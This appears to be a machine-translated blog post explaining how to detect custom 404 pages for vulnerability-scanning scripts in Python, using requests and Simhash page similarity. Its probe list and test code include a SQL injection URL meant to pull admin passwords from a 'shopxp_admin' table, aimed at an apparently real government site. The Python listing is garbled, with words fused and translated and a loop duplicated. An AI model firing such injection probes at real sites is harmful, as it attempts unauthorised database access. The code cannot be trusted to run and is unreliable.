Some sites provide a custom error page for user friendly interaction, rather than displaying a large 404, such as the 404 Hint page on csdn as follows:
This improves the user experience, but when writing the corresponding POC for detection only based on the HTTP header information returned, it is likely to cause false positives, in order to accurately detect the 404 page,
Need to judge from two aspects of Status code and page content.
It's easier to judge from the status code. You can send HTTP requests directly using the requests library and get a response code.
Judging from the content of the page, the idea is to visit the Web site obviously does not exist on the page, get the page content to save, and then visit the target page, compare the two, if the similarity reaches a certain threshold, then the page is 404 pages, otherwise the normal page.
In order to determine the similarity of two pages, using the Python Simhash Library, the implementation of this library specific algorithm I do not understand, but the advantage of Python is: do not know it doesn't matter, directly to use the line. Here's just a simple way to use it:
#-*-encoding:utf-8-*-# 404 Page Recognition fromHashes.simhashImportSimhashImportRequestsclasspage_404:def __init__( Self, domain):#检测站点 Self. _404_page=[]# 404 Pages Self. _404_url=[]#404 URL Self. _404_path=["Test_404.html","404_test.html","Helloworld.html","test.asp?action=modify&newsid=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20fROM%20shopxp_admin "]#404页面路径, used to generate a portion of 404 pages Self. _404_code=[ $,301,302]#当前可能是404页面的http请求的返回值 #自己构造404url to collect some 404 pages of information forPathinch Self. _404_path: forPathinch Self. _404_path:ifdomain[-1]== "/": URL=Domain+PathElse: URL=Domain+ "/" +Path response=Requests.get (URL)ifResponse.status_codeinch Self. _404_code: Self. kb_appent (response.content, URL)defKb_appent ( Self, _404_page, _404_url):if_404_page not inch Self. _404_page: Self. _404_page.append (_404_page)if_404_url not inch Self. _404_url: Self. _404_url.append (_404_url)defIs_similar_page ( Self, Page1, Page2): Hash1=Simhash (Page1) hash2=Simhash (Page2) Similar=Hash1.similarity (HASH2)ifSimilar> 0.85:#当前阈值定义为0. return True Else:return False defis_404 ( Self, URL):ifUrlinch Self. _404_url:return TrueResponse=Requests.get (URL)ifResponse.status_code== 404:return True ifResponse.status_codeinch Self. _404_code: forPageinch Self. _404_page:if Self. Is_similar_page (Response.content, page): Self. kb_appent (URL, response.content)#如果是404页面, the current URL and page information is saved return True Else:return False return False
In the above code, the detection class mainly holds such a few information:
_404_page:404 page, for the other requested page similarity judgment, in order to identify 404 pages, where the list is mainly to prevent a site has a number of 404 pages, The longer this code runs, the higher the accuracy of the
_404_url:404 page URL, before saving to determine that the page is a 404 URL, has been judged to no longer judge, in order to improve efficiency
_404_path: To build the URL of a nonexistent page, The last is a SQL injection code, here in order to identify those blocked by the firewall to display the error page
_404_code: May return 404 page response code, if the response code is these, you need to judge the page
class needs to pass in a domain name at initialization. According to this domain name to splice several non-existent or will be blocked by the firewall request and submit these requests, get the return information, the information as a judgment to save. The
is judged first based on the previously saved 404 URL information, and if the current URL is 404, it returns directly, improving efficiency. It then submits the normal HTTP request and gets the response information,
returns TRUE if the response code is 404, otherwise the status code is in the _404_code list, and the result is compared to the previously saved 404 page information. The test code for the
code is as follows:
fromimport page_404if__name__==‘__main__‘: ="http://xzylrd.gov.cn" = page_404(domain) ="http://xzylrd.gov.cn/TEXTBOX2.ASP?action=modify&newsid=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin" print (check_404.is_404(dest_url))
Python Detection 404 page